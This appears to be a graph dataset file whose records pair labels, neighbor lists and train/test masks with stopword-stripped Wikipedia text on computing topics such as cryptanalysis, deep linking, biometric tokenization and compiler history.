    "text": "Cryptanalysis:cryptanalysis cryptanalysis greek kryptós hidden analýein loosen untie study analyzing information systems order study hidden aspects systems cryptanalysis used breach cryptographic security systems gain access contents encrypted messages even cryptographic key unknown addition mathematical analysis cryptographic algorithms cryptanalysis includes study side-channel attacks target weaknesses cryptographic algorithms instead exploit weaknesses implementation even though goal methods techniques cryptanalysis changed drastically history cryptography adapting increasing cryptographic complexity ranging pen-and-paper methods past machines like british bombes colossus computers bletchley park world war ii mathematically advanced computerized schemes present methods breaking modern cryptosystems often involve solving carefully constructed problems pure mathematics best-known integer factorization given encrypted data ciphertext goal cryptanalyst gain much information possible original unencrypted data plaintext useful consider two aspects achieving first breaking system — discovering encipherment process works second solving key unique particular encrypted message group messages attacks classified based type information attacker available basic starting point normally assumed purposes analysis general algorithm known shannon maxim enemy knows system — turn equivalent kerckhoffs principle reasonable assumption practice — throughout history countless examples secret algorithms falling wider knowledge variously espionage betrayal reverse engineering occasion ciphers broken pure deduction example german lorenz cipher japanese purple code variety classical schemes attacks also characterised resources require resources include sometimes difficult predict quantities precisely especially attack n't practical actually implement testing academic cryptanalysts tend provide least estimated order magnitude attacks difficulty saying example sha-1 collisions 2 bruce schneier notes even computationally impractical attacks considered breaks breaking cipher simply means finding weakness cipher exploited complexity less brute force never mind brute-force might require 2 encryptions attack requiring 2 encryptions would considered break ... simply put break certificational weakness evidence cipher perform advertised results cryptanalysis also vary usefulness example cryptographer lars knudsen 1998 classified various types attack block ciphers according amount quality secret information discovered academic attacks often weakened versions cryptosystem block cipher hash function rounds removed many attacks become exponentially difficult execute rounds added cryptosystem possible full cryptosystem strong even though reduced-round variants weak nonetheless partial breaks come close breaking original cryptosystem may mean full break follow successful attacks des md5 sha-1 preceded attacks weakened versions academic cryptography weakness break scheme usually defined quite conservatively might require impractical amounts time memory known plaintexts also might require attacker able things many real-world attackers ca n't example attacker may need choose particular plaintexts encrypted even ask plaintexts encrypted using several keys related secret key furthermore might reveal small amount information enough prove cryptosystem imperfect little useful real-world attackers finally attack might apply weakened version cryptographic tools like reduced-round block cipher step towards breaking full system cryptanalysis coevolved together cryptography contest traced history cryptography—new ciphers designed replace old broken designs new cryptanalytic techniques invented crack improved schemes practice viewed two sides coin secure cryptography requires design possible cryptanalysis successful cryptanalysis undoubtedly influenced history ability read presumed-secret thoughts plans others decisive advantage example england 1587 mary queen scots tried executed treason result involvement three plots assassinate elizabeth england plans came light coded correspondence fellow conspirators deciphered thomas phelippes world war breaking zimmermann telegram instrumental bringing united states war world war ii allies benefitted enormously joint success cryptanalysis german ciphers — including enigma machine lorenz cipher — japanese ciphers particularly 'purple jn-25 'ultra intelligence credited everything shortening end european war two years determining eventual result war pacific similarly helped 'magic intelligence governments long recognized potential benefits cryptanalysis intelligence military diplomatic established dedicated organizations devoted breaking codes ciphers nations example gchq nsa organizations still active today 2004 reported united states broken iranian ciphers unknown however whether pure cryptanalysis whether factors involved although actual word cryptanalysis relatively recent coined william friedman 1920 methods breaking codes ciphers much older first known recorded explanation cryptanalysis given 9th-century arab polymath al-kindi also known alkindus europe manuscript deciphering cryptographic messages treatise includes description method frequency analysis ibrahim al-kadi 1992- ref-3 italian scholar giambattista della porta author seminal work cryptanalysis de furtivis literarum notis frequency analysis basic tool breaking classical ciphers natural languages certain letters alphabet appear often others english e likely common letter sample plaintext similarly digraph th likely pair letters english frequency analysis relies cipher failing hide statistics example simple substitution cipher letter simply replaced another frequent letter ciphertext would likely candidate e frequency analysis cipher therefore relatively easy provided ciphertext long enough give reasonably representative count letters alphabet contains europe 15th 16th centuries idea polyalphabetic substitution cipher developed among others french diplomat blaise de vigenère 1523–96 three centuries vigenère cipher uses repeating key select different encryption alphabets rotation considered completely secure le chiffre indéchiffrable — indecipherable cipher nevertheless charles babbage 1791–1871 later independently friedrich kasiski 1805–81 succeeded breaking cipher world war inventors several countries developed rotor cipher machines arthur scherbius enigma attempt minimise repetition exploited break vigenère system cryptanalysis enemy messages played significant part allied victory world war ii f. w. winterbotham quoted western supreme allied commander dwight d. eisenhower war end describing ultra intelligence decisive allied victory sir harry hinsley official historian british intelligence world war ii made similar assessment ultra saying shortened war less two years probably four years moreover said absence ultra uncertain war would ended practice frequency analysis relies much linguistic knowledge statistics ciphers became complex mathematics became important cryptanalysis change particularly evident world war ii efforts crack axis ciphers required new levels mathematical sophistication moreover automation first applied cryptanalysis era polish bomba device british bombe use punched card equipment colossus computers — first electronic digital computers controlled program reciprocal machine ciphers lorenz cipher enigma machine used nazi germany world war ii message key usually transmitting operator informed receiving operator message key transmitting plaintext and/or ciphertext enciphered message termed indicator indicates receiving operator set machine decipher message poorly designed implemented indicator systems allowed first polish cryptographers british cryptographers bletchley park break enigma cipher system similar poor indicator systems allowed british identify depths led diagnosis lorenz sz40/42 cipher system comprehensive breaking messages without cryptanalysts seeing cipher machine sending two messages key insecure process cryptanalyst messages said depth may detected messages indicator sending operator informs receiving operator key generator initial settings message generally cryptanalyst may benefit lining identical enciphering operations among set messages example vernam cipher enciphers bit-for-bit combining plaintext long key using exclusive operator also known modulo-2 addition symbolized ⊕ deciphering combines key bits ciphertext reconstruct plaintext modulo-2 arithmetic addition subtraction two ciphertexts aligned depth combining eliminates common key leaving combination two plaintexts individual plaintexts worked linguistically trying probable words phrases also known cribs various locations correct guess combined merged plaintext stream produces intelligible text plaintext component recovered fragment second plaintext often extended one directions extra characters combined merged plaintext stream extend first plaintext working back forth two plaintexts using intelligibility criterion check guesses analyst may recover much original plaintexts two plaintexts depth analyst may know one corresponds ciphertext practice large problem recovered plaintext combined ciphertext key revealed knowledge key course allows analyst read messages encrypted key knowledge set related keys may allow cryptanalysts diagnose system used constructing even though computation used great effect cryptanalysis lorenz cipher systems world war ii also made possible new methods cryptography orders magnitude complex ever taken whole modern cryptography become much impervious cryptanalysis pen-and-paper systems past seems upper hand pure cryptanalysis historian david kahn notes kahn goes mention increased opportunities interception bugging side channel attacks quantum computers replacements traditional means cryptanalysis 2010 former nsa technical director brian snow said academic government cryptographers moving slowly forward mature field however postmortems cryptanalysis may premature effectiveness cryptanalytic methods employed intelligence agencies remains unknown many serious attacks academic practical cryptographic primitives published modern era computer cryptography thus best modern ciphers may far resistant cryptanalysis enigma cryptanalysis broader field information security remain quite active asymmetric cryptography public key cryptography cryptography relies using two mathematically related keys one private one public ciphers invariably rely hard mathematical problems basis security obvious point attack develop methods solving problem security two-key cryptography depends mathematical questions way single-key cryptography generally conversely links cryptanalysis wider mathematical research new way asymmetric schemes designed around conjectured difficulty solving various mathematical problems improved algorithm found solve problem system weakened example security diffie–hellman key exchange scheme depends difficulty calculating discrete logarithm 1983 coppersmith found faster way find discrete logarithms certain groups thereby requiring cryptographers use larger groups different types groups rsa security depends part upon difficulty integer factorization — breakthrough factoring would impact security rsa 1980 one could factor difficult 50-digit number expense 10 elementary computer operations 1984 state art factoring algorithms advanced point 75-digit number could factored 10 operations advances computing technology also meant operations could performed much faster moore law predicts computer speeds continue increase factoring techniques may continue well likely depend mathematical insight creativity neither ever successfully predictable 150-digit numbers kind used rsa factored effort greater unreasonable fast modern computers start 21st century 150-digit numbers longer considered large enough key size rsa numbers several hundred digits still considered hard factor 2005 though methods probably continue improve time requiring key size keep pace methods elliptic curve cryptography used another distinguishing feature asymmetric schemes unlike attacks symmetric cryptosystems cryptanalysis opportunity make use knowledge gained public key quantum computers still early phases research potential use cryptanalysis example shor algorithm could factor large numbers polynomial time effect breaking commonly used forms public-key encryption using grover algorithm quantum computer brute-force key search made quadratically faster however could countered doubling key length",
    "neighbors": [
      509,
      2567,
      3084,
      1044,
      2580,
      2074,
      4128,
      10788,
      3629,
      10806,
      7735,
      2110,
      9289,
      10315,
      6223,
      10831,
      1105,
      8273,
      10329,
      1114,
      8283,
      10332,
      8286,
      6755,
      612,
      9319,
      618,
      4719,
      1654,
      6779,
      8828,
      8318,
      4746,
      1169,
      658,
      660,
      1173,
      169,
      173,
      2750,
      5310,
      6863,
      208,
      7887,
      3282,
      10963,
      212,
      2265,
      2273,
      229,
      10997,
      7416,
      6905,
      5373,
      4863,
      6916,
      1797,
      262,
      6928,
      3345,
      8978,
      9214,
      6425,
      1315,
      4389,
      298,
      6954,
      7979,
      2357,
      1847,
      9528,
      1342,
      8514,
      9541,
      9556,
      1381,
      4456,
      1898,
      6509,
      5487,
      11119,
      881,
      8564,
      11639,
      7034,
      892,
      7556,
      7557,
      1928,
      1930,
      5003,
      2957,
      3982,
      9615,
      3984,
      2961,
      4497,
      7056,
      9617,
      3477,
      10128,
      10135,
      8603,
      10662,
      4007,
      6572,
      11185,
      1970,
      6066,
      6578,
      10173,
      9156,
      5574,
      6599,
      1480,
      4552,
      9165,
      7119,
      9170,
      7643,
      9697,
      8674,
      7652,
      11241,
      4595,
      8694,
      503,
      7161,
      5117,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1942,
    "label": 4,
    "text": "Application-level_gateway:application-level gateway context computer networking application-level gateway also known alg application layer gateway application gateway application proxy application-level proxy consists security component augments firewall nat employed computer network allows customized nat traversal filters plugged gateway support address port translation certain application layer control/data protocols ftp bittorrent sip rtsp file transfer im applications etc order protocols work nat firewall either application know address/port number combination allows incoming packets nat monitor control traffic open port mappings firewall pinhole dynamically required legitimate application data thus passed security checks firewall nat would otherwise restricted traffic meeting limited filter criteria alg may offer following functions deep packet inspection packets handled algs given network makes functionality possible alg understands protocol used specific applications supports instance session initiation protocol sip back-to-back user agent b2bua alg allow firewall traversal sip firewall sip traffic terminated alg responsibility permitting sip sessions passes alg instead firewall alg solve another major sip headache nat traversal basically nat built-in alg rewrite information within sip messages hold address bindings session terminates sip alg also handle sdp body sip messages used ubiquitously voip set media endpoints since sdp also contains literal ip addresses ports must translated alg similar proxy server sits client real server facilitating exchange seems industry convention alg job without application configured use intercepting messages proxy hand usually needs configured client application client explicitly aware proxy connects rather real server application layer gateway service microsoft windows provides support third-party plugins allow network protocols pass windows firewall work behind internet connection sharing alg plugins open ports change data embedded packets ports ip addresses windows server 2003 also includes alg ftp plugin alg ftp plugin designed support active ftp sessions nat engine windows alg ftp plugin redirects traffic passes nat destined port 21 ftp control port private listening port 3000–5000 range microsoft loopback adapter alg ftp plugin monitors/updates traffic ftp control channel ftp plugin plumb port mappings nat ftp data channels linux kernel netfilter framework implements nat linux features modules several nat algs",
    "neighbors": [
      5251,
      7364,
      9380,
      5737,
      4074,
      6541,
      6797,
      3792,
      10417,
      5652,
      4725,
      5972,
      8308,
      10271,
      4287
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1943,
    "label": 8,
    "text": "List_of_web_analytics_software:list web analytics software list web analytics software used collect display data visiting website users comparison table web analytics software released free software license comparison table web analytics proprietary software comparison table hosted web analytics software service",
    "neighbors": [
      4096,
      8448,
      10370,
      6533,
      8582,
      1033,
      10636,
      6797,
      5524,
      10262,
      11030,
      7967,
      4640,
      8735,
      11429,
      9768,
      4911,
      6576,
      8623,
      9014,
      823,
      11578,
      10814,
      4033,
      8644,
      2119,
      3401,
      5193,
      467,
      8539,
      10340,
      5607,
      3688,
      235,
      9708,
      8941,
      7022,
      6642,
      2552,
      3323,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1944,
    "label": 8,
    "text": "Deep_linking:deep linking context world wide web deep linking use hyperlink links specific generally searchable indexed piece web content website e.g nowiki http //example.com/path/page /nowiki rather website home page e.g. nowiki http //example.com /nowiki url contains information needed point particular item case example section english wikipedia article entitled deep linking opposed information needed point highest-level home page wikipedia codice_1 technology behind world wide web hypertext transfer protocol http actually make distinction deep links links—all links functionally equal intentional one design purposes web allow authors link published document another site possibility so-called deep linking therefore built web technology http urls default—while site attempt restrict deep links requires extra effort according world wide web consortium technical architecture group attempt forbid practice deep linking based misunderstanding technology threatens undermine functioning web whole commercial websites object sites making deep links content either bypasses advertising main pages passes content linker like wall street journal charge users permanently valid links sometimes deep linking led legal action 1997 case ticketmaster versus microsoft microsoft deep-linked ticketmaster site sidewalk service case settled microsoft ticketmaster arranged licensing agreement ticketmaster later filed similar case tickets.com judge case ruled linking legal long clear linked pages belonged court also concluded urls copyrightable writing url simply address open public like street address building known enable user reach building nothing sufficiently original make url copyrightable item especially way used appear cases holding urls subject copyright principle websites built technologies adobe flash ajax often support deep linking cause usability problems visitors sites example may unable save bookmarks individual pages states site use web browser forward back buttons—and clicking browser refresh button may return user initial page however fundamental limitation technologies well-known techniques libraries swfaddress unfocus history keeper exist website creators using flash ajax use provide deep linking pages within sites probably earliest legal case arising deep linking 1996 scottish case shetland times vs shetland news times accused news appropriating stories times nowiki /nowiki website beginning 2006 case search engine bixee.com job site naukri.com delhi high court india prohibited bixee.com deeplinking naukri.com important widely cited u.s. opinions deep linking ninth circuit rulings kelly v. arriba soft corp. perfect 10 inc. v. amazon.com inc. cases court exonerated use deep linking second cases court explained speaking defendant google perfect 10 also sued linking copyright infringement us law google not…display copy full-size infringing photographic images purposes copyright act google frames in-line linked images appear user computer screen google computers store photographic images google copy images purposes copyright act words google material objects…in work fixed…and work perceived reproduced otherwise communicated thus communicate copy instead communicating copy image google provides html instructions direct user browser website publisher computer stores full-size photographic image providing html instructions equivalent showing copy first html instructions lines text photographic image second html instructions cause infringing images appear user computer screen html merely gives address image user browser browser interacts computer stores infringing image interaction causes infringing image appear user computer screen google may facilitate user access infringing images however assistance raised contributory liability issues constitute direct infringement copyright owner display rights …while in-line linking framing may cause computer users believe viewing single google webpage copyright act unlike trademark act protect copyright holder acts cause consumer confusion december 2006 texas court ruled linking motocross website videos texas-based motocross video production website constitute fair use court subsequently issued injunction case sfx motor sports inc. v. davis published official reports available 2006 wl 3616983 february 2006 ruling danish maritime commercial court copenhagen found systematic crawling indexing deep linking portal site ofir.dk real estate site home.dk conflict danish law database directive european union court stated search engines desirable functioning internet publishing information internet one must assume—and accept—that search engines deep-link individual pages one website web site owners n't want search engines deep link want index specific pages request using robots exclusion standard robots.txt file people favor deep linking often feel content owners n't provide robots.txt file implying default object deep linking either search engines others people deep linking often claim content owners may unaware robots exclusion standard may use robots.txt reasons sites search engines also deep link content sites question relevance robots exclusion standard controversies deep linking robots exclusion standard programmatically enforce directives prevent search engines others follow polite conventions deep linking",
    "neighbors": [
      2016,
      2945,
      6469,
      1802,
      1774,
      6672,
      113,
      119,
      4378,
      1723,
      124,
      4797,
      5724
    ],
    "mask": "Test"
  },
  {
    "node_id": 1945,
    "label": 4,
    "text": "Biometric_tokenization:biometric tokenization biometric tokenization process substituting stored biometric template non-sensitive equivalent called token lacks extrinsic exploitable meaning value process combines biometrics public-key cryptography enable use stored biometric template e.g. fingerprint image mobile desktop device secure strong authentication applications systems without presenting template original replicable form biometric tokenization particular builds upon longstanding practice tokenization sequestering secrets manner secret user credentials like usernames passwords personally identifiable information pii represented substitute key public sphere technology closely associated authentication online applications running desktop computers mobile devices internet things iot nodes specific use cases include secure login payments physical access management smart connected products connected homes connected cars well adding biometric component two-factor authentication multi-factor authentication september 9 2014 launch apple pay service cupertino calif.-based apple inc. initiated conversation surrounding use biometricsupported tokenization payment data point sale retail transactions apple pay tokenizes mobile users ’ virtualized bank card data order wirelessly transmit payment represented token participating retailers support apple pay e.g partnerships supported hardware apple pay leverages proprietary touch id fingerprint scanner proprietary iphone line aside cryptography added security apple a7 system chip includes secure enclave hardware feature stores protects data touch id fingerprint sensor apple pay least payments credited innovating space biometric tokenization even use case limited payment convenience security restricted company ’ hardware software despite fact executives publicly utter phrase “ biometric tokenization ” speak underlying technology biometric tokenization apple pay similar biometric tokenization known today particularly using term verbatim authentication feature goes beyond payment convenience security distinctive features biometric tokenization implemented operating systems osx microsoft windows google android password-less login desktop mobile applications biometric tokenization like non-biometric counterpart tokenization utilizes end-to-end encryption safeguard data transit biometric tokenization user initiates authentication first accessing unlocking biometrics fingerprint recognition facial recognition system speech recognition iris recognition retinal scan combination biometric modalities user ’ unique qualities generally stored one two ways either on-device trusted execution environment tee trusted platform module tpm server way data stored biometric tokenization champions typically prefer biometric templates encrypted stored tees tpms prevent large-scale data breaches june 2015 u.s. office personnel management one biometric tokenization aided on-device storage user data also preserve internet privacy user data stored individually inside single devices rather aggregated ostensibly vulnerable servers moving biometric user credentials either two-factor authentication unqualified authentication example servers onto devices tenet fast identity online fido alliance industry consortium concerned replacing passwords decentralized biometrics next step biometric tokenization unlocking user credentials trusted area device credentials tokenized token containing precise data required action e.g login payment access token time-stamped case one-time passwords session tokens useful specific time period may biometric tokenization token validated means joint client-side server-side validation occurs challenge-response token exchange user logged authenticated otherwise granted access order achieve highest level privacy protection calculating transmitting sensitive information biometric tokenization leverages existing encryption algorithms authentication protocols well hardware trust zones combining methods maximizes level protection needed uphold integrity process security data could otherwise expose users breach trust mass scale",
    "neighbors": [
      7936,
      8674,
      9732,
      4965,
      11336,
      8171,
      10207,
      11244,
      10673,
      10199,
      7354,
      10557,
      1054,
      6975
    ],
    "mask": "None"
  },
  {
    "node_id": 1946,
    "label": 4,
    "text": "Ben_Laurie:ben laurie ben laurie software engineer protocol designer cryptographer founding director apache software foundation core team member openssl member shmoo group director open rights group director security bunker secure hosting trustee founder-member freebmd visiting fellow cambridge university computer laboratory laurie works google london various projects currently focused certificate transparency ben wrote apache-ssl basis ssl-enabled versions apache http server co-author openpgp sdk developed mud gods innovative including online creation endgame ben also written several articles papers books many found home page blog interested ideal knots applications",
    "neighbors": [
      8320,
      7425,
      2180,
      1157,
      1927,
      1801,
      10761,
      9744,
      274,
      9625,
      4636,
      2212,
      4133,
      6438,
      3495,
      10535,
      297,
      684,
      4908,
      1071,
      3248,
      9009,
      11698,
      11573,
      1718,
      9784,
      1465,
      5177,
      5819,
      3006,
      11459,
      9927,
      8266,
      8395,
      4940,
      8909,
      5710,
      6864,
      7249,
      850,
      10455,
      6361,
      8410,
      6491,
      9306,
      889,
      607,
      3551,
      865,
      7521,
      1891,
      998,
      7144,
      4073,
      5483,
      7019,
      8816,
      2545,
      3058,
      7027,
      9201,
      2421,
      9844,
      11506,
      2424,
      1273,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 1947,
    "label": 9,
    "text": "Peter_Landin:peter landin peter john landin 5 june 1930 – 3 june 2009 british computer scientist one first realise lambda calculus could used model programming language insight essential development functional programming denotational semantics landin born sheffield attended king edward vii school graduated clare college cambridge university 1960 1964 assistant christopher strachey latter independent computer consultant london work published period brief time worked univac massachusetts institute technology united states taking position queen mary university london 1970s 1980s efforts went building computer science department queen mary college developing courses teaching students retirement appointed emeritus professor theoretical computation queen mary university london 2012 computer science building renamed peter landin building honour workshop science museum london 2001 history programming semantics spoke scholarly career computer science began late 1950s much influenced study mccarthy lisp commonly used language fortran active definition algol programming language cited tony hoare one people taught algol 60 hence facilitated expression powerful recursive algorithms around easter 1961 course algol 60 offered brighton england peter naur edsger w. dijkstra peter landin tutors ... first learned recursive procedures saw program sorting method earlier found difficulty explaining wrote procedure immodestly named quicksort career computer scientist founded due credit must paid genius designers algol 60 included recursion language enabled describe invention elegantly world regarded highest goal programming language design enable good ideas elegantly expressed landin responsible inventing secd machine first abstract machine functional programming language iswim programming language defining landin off-side rule coining term syntactic sugar off-side rule allows bounding scope declaration use white spaces seen languages miranda haskell python f using light syntax another phrase originating landin next 700 ... influential paper next 700 programming languages 700 chosen landin read journal acm already 700 programming languages existence paper opens quotation ... today ... 1,700 special programming languages used 'communicate 700 application areas also includes joke possible first step research program 1700 doctoral theses called correspondence x church λ-notation reference earlier paper dry sense humour expressed many papers landin bisexual became involved gay liberation front glf early 1970s arrested part anti-nuclear demonstration dedicated cyclist moved around london bike became physically impossible",
    "neighbors": [
      512,
      5651,
      2595,
      3876,
      10403,
      1333,
      4799,
      10435,
      3529,
      1610,
      1611,
      5456,
      5585,
      10581,
      9047,
      9315,
      1124,
      10083,
      6502,
      8554,
      2283,
      3960
    ],
    "mask": "None"
  },
  {
    "node_id": 1948,
    "label": 7,
    "text": "Hosted_desktop:hosted desktop hosted desktop product set within larger cloud-computing sphere generally delivered using combination technologies including hardware virtualization form remote connection software citrix xenapp microsoft remote desktop services two common processing takes place within provider datacentre environment traffic datacentre client primarily display updates mouse movements keyboard activity additional traffic generated audio print jobs hosted desktop commonly involves browser-based connection desktop environment includes office productivity suite alongside desktop applications desktop hosted run delivered supported central location usually secure data center high-quality resilient connections internet/cloud cloud desktop term often used refer container collection virtual objects software hardware configurations etc. residing cloud used client interact remote services perform computer related tasks connecting clients run pre-installed downloaded viewer applications via one many remote desktop protocols clients include thin clients pcs workstations mobile handheld devices running variety operating systems windows mac os x linux others move towards hosted desktops virtual desktop infrastructure vdi subset predicted gartner account 49 million business desktops 2013 equal 40 percent worldwide professional pc market development applications service providers google microsoft accelerated process evolution new licensing schemes allow fee-paying based subscription rather purchase centralized nature hosted desktops overcome common issues mobile working delivery common infrastructure across physical sites disaster recovery cost control scaling up/down timely fashion hosted desktop services comparatively simple method applying outsourcing principles within business although care warranted ensuring service provider quality ensure compliance data security data protection standards meet requirements hosted desktop based environment generally migrate user authentication file print services application delivery data storage cloud making accessible via secure connections internet enabled location relatively small bandwidth requirements hosted desktop means 5 10 people connect work standard xdsl broadband whilst single user operate quite effectively 3g mobile data connection hosted desktops often based windows server 2008 utilising remote desktop services often additional management layer vendors like citrix systems parallels workstation make personalisation easier licensing type hosted desktop provided microsoft service provider license agreement spla special type end-user license agreement user rents appropriate licenses part monthly fee paid service provider receives automatic upgrade rights latest version software part agreement backup disaster recovery handled hosted desktop vendor best solutions also providing failover alternate datacentres hosted desktop vendors utilising vmware microsoft technology charges normally monthly basic charge applied user hosted desktop additional charges office productivity suite additional data storage extra applications vendors wrap suite common applications product sets simplify still",
    "neighbors": [
      11177,
      4194,
      5371
    ],
    "mask": "Test"
  },
  {
    "node_id": 1949,
    "label": 4,
    "text": "Call_blocking:call blocking call blocking also known call block call screening call rejection allows telephone subscriber block incoming calls specific telephone numbers feature may require additional payment subscriber telephone company third-party call blocking desired individuals wish block unwanted phone calls generally include types unsolicited calls telemarketers robocalls unwanted calls landlines may blocked number methods landline phones built-in call blocking facilities external call blockers sold telephone accessories plug existing phones call blockers related services recently received attention 2016 publications including consumer reports united kingdom united states respectively devices services enable user block call progress alternatively block number call made devices rely caller id information thus phone blocker requires caller id service active line blocking function may also possible use computer software conjunction caller id information phone company caller id enabled phone modem block incoming call treatment blocked calls may include multitude third-party call blocking applications available smart phones manufacturers provide built-in call blocking functions standard",
    "neighbors": [
      5376,
      9523,
      11170,
      1083
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1950,
    "label": 1,
    "text": "XtraDB:xtradb percona xtradb storage engine mariadb percona server databases intended drop-in replacement innodb one default engines available mysql database 10.1 mariadb mariadb server used percona xtradb default storage engine mariadb 10.2 innodb engine default xtradb xtradb incorporates innodb acid-compliant design mvcc architecture allows greater degree tuning scalability engine also better suited multi-core processing addresses issues known innodb",
    "neighbors": [
      11392,
      8195,
      10258,
      10389,
      7453,
      9503,
      10276,
      7339,
      7983,
      9010,
      10048,
      6721,
      5964,
      5198,
      7506,
      9687,
      10459,
      6245,
      8295,
      8683,
      5612,
      2413,
      7022,
      3188,
      4598,
      10873,
      2810
    ],
    "mask": "Test"
  },
  {
    "node_id": 1951,
    "label": 9,
    "text": "MEX_file:mex file mex file type computer file provides interface matlab octave functions written c c++ fortran stands matlab executable compiled mex files dynamically loaded allow external functions invoked within matlab octave built-in functions support development mex files matlab octave offer external interface functions facilitate transfer data mex files workspace addition mex files octave format using native api better performance",
    "neighbors": [
      2432,
      5703,
      3960,
      2045,
      7326
    ],
    "mask": "Test"
  },
  {
    "node_id": 1952,
    "label": 9,
    "text": "Compiler:compiler compiler computer program translates computer code written one programming language source language another programming language target language name compiler primarily used programs translate source code high-level programming language lower level language e.g. assembly language object code machine code create executable program however many different types compilers compiled program run computer whose cpu operating system different one compiler runs compiler cross-compiler bootstrap compiler written language intends compile program translates low-level language higher level one decompiler program translates high-level languages usually called source-to-source compiler transpiler language rewriter usually program translates form expressions without change language term compiler-compiler refers tools used create parsers perform syntax analysis compiler likely perform many following operations preprocessing lexical analysis parsing semantic analysis syntax-directed translation conversion input programs intermediate representation code optimization code generation compilers implement operations phases promote efficient design correct transformations source input target output program faults caused incorrect compiler behavior difficult track work around therefore compiler implementers invest significant effort ensure compiler correctness compilers language processor used transform source programs interpreter computer software transforms executes indicated operations translation process influences design computer languages leads preference compilation interpretation practice interpreter implemented compiled languages compilers implemented interpreted languages theoretical computing concepts developed scientists mathematicians engineers formed basis digital modern computing development world war ii primitive binary languages evolved digital devices understand ones zeros circuit patterns underlying machine architecture late 1940s assembly languages created offer workable abstraction computer architectures limited memory capacity early computers led substantial technical challenges first compilers designed therefore compilation process needed divided several small programs front end programs produce analysis products used back end programs generate target code computer technology provided resources compiler designs could align better compilation process usually productive programmer use high-level language development high-level languages followed naturally capabilities offered digital computers high-level languages formal languages strictly defined syntax semantics form high-level language architecture elements formal languages include sentences language may defined set rules called grammar backus–naur form bnf describes syntax sentences language used syntax algol 60 john backus ideas derive context-free grammar concepts noam chomsky linguist bnf extensions become standard tools describing syntax programming notations many cases parts compilers generated automatically bnf description 1940s konrad zuse designed algorithmic programming language called plankalkül plan calculus actual implementation occurred 1970s presented concepts later seen apl designed ken iverson late 1950s apl language mathematical computations high-level language design formative years digital computing provided useful programming tools variety applications compiler technology evolved need strictly defined transformation high-level source program low-level target program digital computer compiler could viewed front end deal analysis source code back end synthesize analysis target code optimization front end back end could produce efficient target code early milestones development compiler technology early operating systems software written assembly language 60s early 70s use high-level languages system programming still controversial due resource limitations however several research industry efforts began shift toward high-level systems programming languages example bcpl bliss b c. bcpl basic combined programming language designed 1966 martin richards university cambridge originally developed compiler writing tool several compilers implemented richards book provides insights language compiler bcpl influential systems programming language still used research also provided basis design b c languages bliss basic language implementation system software developed digital equipment corporation dec pdp-10 computer w.a wulf carnegie mellon university cmu research team cmu team went develop bliss-11 compiler one year later 1970 multics multiplexed information computing service time-sharing operating system project involved mit bell labs general electric later honeywell led fernando corbató mit multics written pl/i language developed ibm ibm user group ibm goal satisfy business scientific systems programming requirements languages could considered pl/i offered complete solution even though implemented first years mulitics project subset language could compiled assembly language early pl/i epl compiler doug mcilory bob morris bell labs epl supported project boot-strapping compiler full pl/i could developed bell labs left multics project 1969 time hope replaced frustration group effort initially failed produce economically useful system continued participation would drive project support costs researchers turned development efforts system programming language b based bcpl concepts written dennis ritchie ken thompson ritchie created boot-strapping compiler b wrote unics uniplexed information computing service operating system pdp-7 b. unics eventually became spelled unix bell labs started development expansion c based b bcpl bcpl compiler transported multics bell labs bcpl preferred language bell labs initially front-end program bell labs b compiler used c compiler developed 1971 new pdp-11 provided resource define extensions b rewrite compiler 1973 design c language essentially complete unix kernel pdp-11 rewritten c. steve johnson started development portable c compiler pcc support retargeting c compilers new machines object-oriented programming oop offered interesting possibilities application development maintenance oop concepts go back part lisp simula language science bell labs development c++ became interested oop c++ first used 1980 systems programming initial design leveraged c language systems programming capabilities simula concepts object-oriented facilities added 1983 cfront program implemented c++ front-end c84 language compiler subsequent years several c++ compilers developed c++ popularity grew many application domains idea using higher-level language quickly caught expanding functionality supported newer programming languages increasing complexity computer architectures compilers became complex darpa defense advanced research projects agency sponsored compiler project wulf cmu research team 1970 production quality compiler-compiler pqcc design would produce production quality compiler pqc formal definitions source language target pqcc tried extend term compiler-compiler beyond traditional meaning parser generator e.g. yacc without much success pqcc might properly referred compiler generator pqcc research code generation process sought build truly automatic compiler-writing system effort discovered designed phase structure pqc bliss-11 compiler provided initial structure phases included analyses front end intermediate translation virtual machine middle end translation target back end tcol developed pqcc research handle language specific constructs intermediate representation variations tcol supported various languages pqcc project investigated techniques automated compiler construction design concepts proved useful optimizing compilers compilers object-oriented programming language ada ada stoneman document formalized program support environment apse along kernel kapse minimal mapse ada interpreter nyu/ed supported development standardization efforts american national standards institute ansi international standards organization iso initial ada compiler development u.s. military services included compilers complete integrated design environment along lines stoneman document army navy worked ada language system als project targeted dec/vax architecture air force started ada integrated environment aie targeted ibm 370 series projects provide desired results contribute overal effort ada development ada compiler efforts got underway britain university york germany university karlsruhe u. s. verdix later acquired rational delivered verdix ada development system vads army vads provided set development tools including compiler unix/vads could hosted variety unix platforms dec ultrix sun 3/60 solaris targeted motorola 68020 army cecom evaluation soon many ada compilers available passed ada validation tests free software foundation gnu project developed gnu compiler collection gcc provides core capability support multiple languages targets ada version gnat one widely used ada compilers gnat free also commercial support example adacore founded 1994 provide commercial software solutions ada gnat pro includes gnu gcc based gnat tool suite provide integrated development environment high-level languages continued drive compiler research development focus areas included optimization automatic code generation trends programming languages development environments influenced compiler technology compilers became included language distributions perl java development kit component ide vads eclipse ada pro interrelationship interdependence technologies grew advent web services promoted growth web languages scripting languages scripts trace back early days command line interfaces cli user could enter commands executed system user shell concepts developed languages write shell programs early windows designs offered simple batch programming capability conventional transformation language used interpreter widely used bash batch compilers written recently sophisticated interpreted languages became part developers tool kit modern scripting languages include php python ruby lua lua widely used game development interpreter compiler support field compiling began late 50s focus limited translation high-level language programs machine code ... compiler field increasingly intertwined disciplines including computer architecture programming languages formal methods software engineering computer security compiler research next 50 years article noted importance object-oriented languages java security parallel computing cited among future research targets compiler implements formal transformation high-level source program low-level target program compiler design define end end solution tackle defined subset interfaces compilation tools e.g preprocessors assemblers linkers design requirements include rigorously defined interfaces internally compiler components externally supporting toolsets early days approach taken compiler design directly affected complexity computer language processed experience person designing resources available resource limitations led need pass source code compiler relatively simple language written one person might single monolithic piece software however source language grows complexity design may split number interdependent phases separate phases provide design improvements focus development functions compilation process classifying compilers number passes background hardware resource limitations computers compiling involves performing lots work early computers enough memory contain one program work compilers split smaller programs made pass source representation performing required analysis translations ability compile single pass classically seen benefit simplifies job writing compiler one-pass 